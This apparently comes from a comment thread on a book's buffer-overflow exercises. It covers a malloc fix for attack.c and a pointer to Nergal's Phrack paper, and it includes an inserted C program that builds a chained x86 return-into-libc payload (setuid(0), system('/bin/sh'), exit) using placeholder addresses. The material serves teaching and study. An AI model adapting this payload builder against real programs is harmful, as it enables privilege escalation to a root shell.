if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(1);   /* nonzero: allocation failure is an error, not success */
}
This should go right after your definition of bsize (line 26 in both examples should be fine). Without this line, the app segfaults... which makes sense, in hindsight. We're trying to use heap space that we haven't allocated! Unfortunately, as todb mentioned in a previous post, the technique in attack.c doesn't seem to work, anyway. A future endeavor, perhaps.
Additionally, with reference to ret2libc attacks, there's an excellent paper by Nergal in Phrack 58, titled "The advanced return-into-lib(c) exploits: PaX case study". It can be found over here. It goes into detail about techniques to chain multiple ret2libc calls together, in addition to an in-depth discussion about PaX.
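The chaining technique the commenter points to in Nergal's paper works by returning from each libc call into a "pop reg; ret" gadget, which discards the call's argument from the stack and lands on the next function address. The following x86-32 payload builder is an added example, not code from the book, from attack.c or from the commenter; every address in it (setuid, system, exit, the pop-ret gadget, the "/bin/sh" string) is a constructed placeholder that a real exploit would take from the target's libc and binary, and the 64-byte filler is likewise an assumed distance to the saved return address.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stack layout produced by build_ret2libc_chain(), starting at the saved EIP:
 *
 *   [call0.func][call0.pop_ret][call0.arg]   func returns into pop_ret,
 *   [call1.func][call1.pop_ret][call1.arg]   which pops arg and returns
 *   ...                                      into the next func
 *   [final_func][fake_ret][final_arg]        the last call never returns
 *
 * Each callee reads its single argument from [esp+4], exactly as a normal
 * C call would have placed it. All addresses in this file are hypothetical.
 */
struct chain_call {
    uint32_t func;    /* libc function taking one argument, e.g. setuid */
    uint32_t pop_ret; /* address of a "pop reg; ret" gadget */
    uint32_t arg;     /* the argument to pass */
};

static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

uint32_t get_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Filler up to the saved EIP, 12 bytes per chained call, 12 for the final call. */
size_t ret2libc_chain_len(size_t ret_offset, size_t ncalls)
{
    return ret_offset + ncalls * 12 + 12;
}

/* Writes the payload into out; returns its length, or 0 if out is too small. */
size_t build_ret2libc_chain(unsigned char *out, size_t out_len, size_t ret_offset,
                            const struct chain_call *calls, size_t ncalls,
                            uint32_t final_func, uint32_t final_arg)
{
    size_t need = ret2libc_chain_len(ret_offset, ncalls);
    if (need > out_len)
        return 0;

    memset(out, 'A', ret_offset);               /* filler up to the saved EIP */
    size_t off = ret_offset;
    for (size_t i = 0; i < ncalls; i++) {
        put_le32(out + off, calls[i].func);    off += 4;
        put_le32(out + off, calls[i].pop_ret); off += 4;
        put_le32(out + off, calls[i].arg);     off += 4;
    }
    put_le32(out + off, final_func);  off += 4;
    put_le32(out + off, 0x42424242u); off += 4;  /* return address of the final call, never used */
    put_le32(out + off, final_arg);   off += 4;
    return off;
}

/* A strcpy()-style overflow stops at the first NUL, so any zero byte after the
 * filler truncates the chain. Returns the offset of the first such byte, or -1.
 * setuid(0) is the classic offender, which is exactly the case Nergal's paper
 * spends effort working around. */
long first_nul_after(const unsigned char *payload, size_t len, size_t ret_offset)
{
    for (size_t i = ret_offset; i < len; i++)
        if (payload[i] == 0)
            return (long)i;
    return -1;
}

/* Constructed demo: setuid(0); system("/bin/sh"); exit(0) with placeholder addresses. */
unsigned char g_payload[256];

size_t demo_chain(void)
{
    struct chain_call calls[] = {
        { 0x11223344u /* setuid */, 0x55667788u /* pop ebx; ret */, 0x00000000u },
        { 0xaabbccddu /* system */, 0x55667788u /* pop ebx; ret */, 0x0badc0deu /* "/bin/sh" */ },
    };
    return build_ret2libc_chain(g_payload, sizeof g_payload, 64, calls, 2,
                                0x99887766u /* exit */, 0x00000000u);
}

int main(void)
{
    size_t len = demo_chain();
    printf("payload: %zu bytes, first NUL after filler at offset %ld\n",
           len, first_nul_after(g_payload, len, 64));
    return 0;
}
```

The gadget is reused for every intermediate call because each one takes a single argument; a two-argument call would need a "pop; pop; ret" gadget and two argument slots. The NUL check is the caveat a practitioner hits first: with a strcpy()-based overflow the zero argument to setuid() cuts the chain short, so the paper's frame-faking and alternative argument tricks exist precisely for that situation.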
Thanks a Lot!!!!!!!!!!
Belgians (the site or the people) are the best!
I hope we meet one day to discuss this book or plan some project :)
But first I must improve myself...
It's worth mentioning that attack.c forks a new shell every time it's run, so you should be exiting it after every attack/victim run. A better solution would have been to export BUF instead of forking a new shell.
It's also worth mentioning that the author's C is not very good and should not be used as a reference point.